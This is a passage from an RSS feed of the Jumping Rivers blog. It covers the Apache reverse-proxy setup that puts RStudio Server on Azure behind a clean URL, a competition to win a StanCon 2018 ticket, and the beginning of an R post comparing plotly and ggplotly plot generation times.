&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Then select configuration. In the text box under DNS Label, enter text, e.g. &lt;code&gt;rstudio-myname&lt;/code&gt;. So in my case, I have used &lt;code&gt;rstudio-jumpingrivers&lt;/code&gt;&lt;/p&gt;
&lt;img class="image-center" src="azure_dashboard_ip.png" style="width:500px; class:image-center"&gt;
&lt;p&gt;This means we can now access RStudio via&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rstudio-jumpingrivers.westeurope.cloudapp.azure.com:8787
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Getting users to type the port number isn’t ideal. What we would like is for users to type&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rstudio-jumpingrivers.westeurope.cloudapp.azure.com/rstudio
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This involves configuring Apache. First navigate to &lt;code&gt;/etc/apache2/sites-available&lt;/code&gt;, e.g.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cd /etc/apache2/sites-available
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Next, using your favourite text editor (e.g. vim or nano), create a file called &lt;code&gt;rstudio.conf&lt;/code&gt;. Note that this file is very sensitive to spacing, so check it carefully.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;VirtualHost *:80&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ServerAdmin hello@jumpingrivers.com
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ServerName rstudio-jumpingrivers.westeurope.cloudapp.azure.com
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ServerAlias www.rstudio-jumpingrivers.westeurope.cloudapp.azure.com
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;Proxy *&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Allow from localhost
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;lt;/Proxy&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Specify path for Logs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ErrorLog &lt;span style="color:#a5d6ff"&gt;${&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;APACHE_LOG_DIR&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;}&lt;/span&gt;/error.log
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; CustomLog &lt;span style="color:#a5d6ff"&gt;${&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;APACHE_LOG_DIR&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;}&lt;/span&gt;/access.log combined
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; RewriteEngine on
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Following lines should open rstudio directly from the url&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Map rstudio to rstudio/&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; RedirectMatch ^/rstudio$ /rstudio/
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; RewriteCond %&lt;span style="color:#ff7b72;font-weight:bold"&gt;{&lt;/span&gt;HTTP:Upgrade&lt;span style="color:#ff7b72;font-weight:bold"&gt;}&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;websocket
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; RewriteRule /rstudio/&lt;span style="color:#ff7b72;font-weight:bold"&gt;(&lt;/span&gt;.*&lt;span style="color:#ff7b72;font-weight:bold"&gt;)&lt;/span&gt; ws://localhost:8787/&lt;span style="color:#79c0ff"&gt;$1&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt;P,L&lt;span style="color:#ff7b72;font-weight:bold"&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; RewriteCond %&lt;span style="color:#ff7b72;font-weight:bold"&gt;{&lt;/span&gt;HTTP:Upgrade&lt;span style="color:#ff7b72;font-weight:bold"&gt;}&lt;/span&gt; !&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;websocket
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; RewriteRule /rstudio/&lt;span style="color:#ff7b72;font-weight:bold"&gt;(&lt;/span&gt;.*&lt;span style="color:#ff7b72;font-weight:bold"&gt;)&lt;/span&gt; http://localhost:8787/&lt;span style="color:#79c0ff"&gt;$1&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;[&lt;/span&gt;P,L&lt;span style="color:#ff7b72;font-weight:bold"&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ProxyPass /rstudio/ http://localhost:8787/
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ProxyPassReverse /rstudio/ http://localhost:8787/
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ProxyRequests off
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;/VirtualHost&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Then enable the necessary Apache modules&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sudo a2enmod proxy
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sudo a2enmod proxy_http
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sudo a2enmod proxy_html
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sudo a2enmod proxy_wstunnel
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sudo a2enmod rewrite
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Finally, enable the new site and restart Apache&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sudo a2ensite rstudio.conf
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sudo service apache2 restart
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You should now be able to access RStudio via&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rstudio-jumpingrivers.westeurope.cloudapp.azure.com/rstudio/
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="adding-ssl"&gt;Adding SSL&lt;/h2&gt;
&lt;p&gt;In theory it should be straightforward to add SSL support using &lt;a href="https://letsencrypt.org/" rel="external"&gt;Let’s Encrypt&lt;/a&gt;. In practice, I’ve found that you hit rate limits since the domain is azure.com. If we register our own domain, though, we can easily add SSL support. This will be the subject of our next blog post.&lt;/p&gt;
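&lt;p&gt;As a rough preview only, one common route with your own domain is the Certbot client and its Apache plugin. The sketch below assumes a hypothetical domain, &lt;code&gt;rstudio.example.com&lt;/code&gt;, whose DNS record already points at the virtual machine, and that port 443 is open. The package names are those used on recent Ubuntu releases and may differ on older ones.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;# Assumption: rstudio.example.com is a placeholder for a domain you own
sudo apt-get install certbot python3-certbot-apache

# Request a certificate and let Certbot update the Apache configuration
sudo certbot --apache -d rstudio.example.com
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;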
&lt;h4 id="references"&gt;References&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://mgw.dumatics.com/rstudio-server-setup-with-ssl-behind-apache-proxy-server/" rel="external"&gt;https://mgw.dumatics.com/rstudio-server-setup-with-ssl-behind-apache-proxy-server/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/hosting-rstudio-server-on-azure/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Competition: StanCon 2018 ticket</title><link>https://www.jumpingrivers.com/blog/competition-stancon-2018-ticket/</link><pubDate>Wed, 29 Nov 2017 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/competition-stancon-2018-ticket/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/competition-stancon-2018-ticket/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/competition-stancon-2018-ticket/original.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/competition-stancon-2018-ticket/#the-prize"&gt;The prize&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/competition-stancon-2018-ticket/#how-do-i-enter"&gt;How do I enter?&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/competition-stancon-2018-ticket/#faq"&gt;FAQ&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Today we are happy to announce our Stan contest. Something we feel very strongly about at Jumping Rivers is giving back to the community. We have benefited immensely from hard work by numerous people, so when possible, we try to give something back.
This year we’re sponsoring StanCon 2018. If you don’t know,&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Stan is freedom-respecting, open-source software for facilitating statistical inference at the frontiers of applied statistics.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Or to put it another way, it makes Bayesian inference fast and (a bit) easier. &lt;a href="http://mc-stan.org/events/stancon2018/" rel="external"&gt;StanCon&lt;/a&gt; is the premier conference for all things &lt;a href="http://mc-stan.org/" rel="external"&gt;Stan&lt;/a&gt; related and this year it will take place at the &lt;a href="http://www.visitasilomar.com/" rel="external"&gt;Asilomar Conference Grounds&lt;/a&gt;, a National Historic Landmark on the Monterey Peninsula right on the beach.&lt;/p&gt;
&lt;p&gt;Our interaction with Stan is via the excellent R package, {rstan} and the &lt;a href="https://www.jumpingrivers.com/training/course/bayesian-inference-stan-rstan-pystan/" rel="external"&gt;introduction to stan&lt;/a&gt; course we run.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2017-competition-stancon-2018-ticket"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="the-prize"&gt;The prize&lt;/h3&gt;
&lt;p&gt;One of the benefits of sponsoring a conference is free tickets. Unfortunately, we can’t make StanCon this year, so we’ve decided to give away the ticket via a competition.&lt;/p&gt;
&lt;h3 id="how-do-i-enter"&gt;How do I enter?&lt;/h3&gt;
&lt;p&gt;Entering the contest is straightforward. We want a nice image to use in our &lt;a href="https://www.jumpingrivers.com/training/course/introduction-bayesian-inference-rstan-monte-carlo/" rel="external"&gt;introduction to stan&lt;/a&gt; course. This can be a cartoon, some neat looking densities, whatever you think!&lt;/p&gt;
&lt;p&gt;For example, my first attempt at a logo resulted in&lt;/p&gt;
&lt;img class="image-center" src="stan-density.png" style="width:350px; max-width:100%"&gt;
&lt;p&gt;Pretty enough, but lacking something.&lt;/p&gt;
&lt;p&gt;Once you’ve come up with your awesome image, simply email &lt;a href="mailto:hello@jumpingrivers.com" rel="external"&gt;hello@jumpingrivers.com&lt;/a&gt; with a link to the image. If the image was generated in R (or another language), then the associated code would be nice. The deadline is the 6th December.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;By popular demand, we’ve moved the deadline to &lt;strong&gt;11th December&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3 id="faq"&gt;FAQ&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Can I submit more than one image? Feel free.&lt;/li&gt;
&lt;li&gt;Who owns the copyright? Our intention is to make the image &lt;a href="https://creativecommons.org/share-your-work/public-domain/cc0/" rel="external"&gt;CC0&lt;/a&gt;. However, we’re happy to change the copyright to suit. The only proviso is that we can use the image for our {rstan} course.&lt;/li&gt;
&lt;li&gt;Another question? Contact us via the &lt;a href="https://www.jumpingrivers.com/contact/" rel="external"&gt;contact page&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/competition-stancon-2018-ticket/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Comparing plotly &amp; ggplotly plot generation times</title><link>https://www.jumpingrivers.com/blog/comparing-plotly-ggplotly-plot-generation-times/</link><pubDate>Mon, 27 Nov 2017 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/comparing-plotly-ggplotly-plot-generation-times/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/comparing-plotly-ggplotly-plot-generation-times/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/comparing-plotly-ggplotly-plot-generation-times/original.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;The {plotly} package is a godsend for interactive documents, dashboards and presentations. For such documents, there is no doubt that anyone would prefer a plot created in {plotly} rather than {ggplot2}. Why? Using {plotly} gives you neat and crucially &lt;em&gt;interactive&lt;/em&gt; options at the top, whereas {ggplot2} objects are static. In an app we have been developing here at &lt;a href="https://www.jumpingrivers.com" rel="external"&gt;Jumping Rivers&lt;/a&gt;, we found ourselves asking the question: would it be quicker to use &lt;code&gt;plot_ly()&lt;/code&gt; or to wrap a {ggplot2} object in &lt;code&gt;ggplotly()&lt;/code&gt;? I found the results staggering.&lt;/p&gt;
&lt;h3 id="prerequisites"&gt;Prerequisites&lt;/h3&gt;
&lt;p&gt;Throughout we will be using the packages {dplyr}, {tidyr}, {ggplot2}, {plotly} and {microbenchmark}. The data in use is the &lt;code&gt;birthdays&lt;/code&gt; dataset in the {mosaicData} package. This data set contains the daily birth count in each state of the USA from 1969 to 1988. The packages can be installed in the usual way (remember you can install packages in &lt;a href="https://www.jumpingrivers.com/blog/speeding-up-package-installation/"&gt;parallel&lt;/a&gt;)&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;mosaicData&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;dplyr&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;tidyr&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;ggplot2&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;plotly&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;microbenchmark&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;mosaicData&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;dplyr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tidyr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;ggplot2&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;plotly&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;microbenchmark&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2017-comparing-plotly-ggplotly-plot-generation-times"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="analysis"&gt;Analysis&lt;/h3&gt;
&lt;p&gt;Let’s load and take a look at the data.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;data&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Birthdays&amp;#34;&lt;/span&gt;, package &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;mosaicData&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(Birthdays)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## state year month day date wday births&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 AK 1969 1 1 1969-01-01 Wed 14&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 AL 1969 1 1 1969-01-01 Wed 174&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 AR 1969 1 1 1969-01-01 Wed 78&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 AZ 1969 1 1 1969-01-01 Wed 84&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 CA 1969 1 1 1969-01-01 Wed 824&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 CO 1969 1 1 1969-01-01 Wed 100&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;First, we’ll create a very simple scatter graph of the mean births in every year.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;meanb &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Birthdays &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;group_by&lt;/span&gt;(year) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;summarise&lt;/span&gt;(mean &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mean&lt;/span&gt;(births))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Wrapping this as a {ggplot2} object inside &lt;code&gt;ggplotly()&lt;/code&gt; we obtain this…&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplotly&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(meanb) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_point&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; mean, x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; year, colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; year)))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="ggplotly1.png" style="width:450px; class:image-center"&gt;
&lt;p&gt;Whilst using &lt;code&gt;plot_ly()&lt;/code&gt; gives us this…&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot_ly&lt;/span&gt;(data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; meanb,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt;mean, x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt;year, color &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt;year,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;scatter&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="plotly1.png" style="width:450px; class:image-center"&gt;
&lt;p&gt;Both graphs are identical, bar styling, yes?
Now let’s use {microbenchmark} to see how their timings compare (for an overview of timing R functions, see our &lt;a href="https://www.jumpingrivers.com/blog/timing-in-r/"&gt;previous blog post&lt;/a&gt;).&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;time &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; microbenchmark&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;microbenchmark&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ggplotly &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplotly&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(meanb) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_point&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; mean, x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; year, colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; year))),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plotly &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot_ly&lt;/span&gt;(data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; meanb,
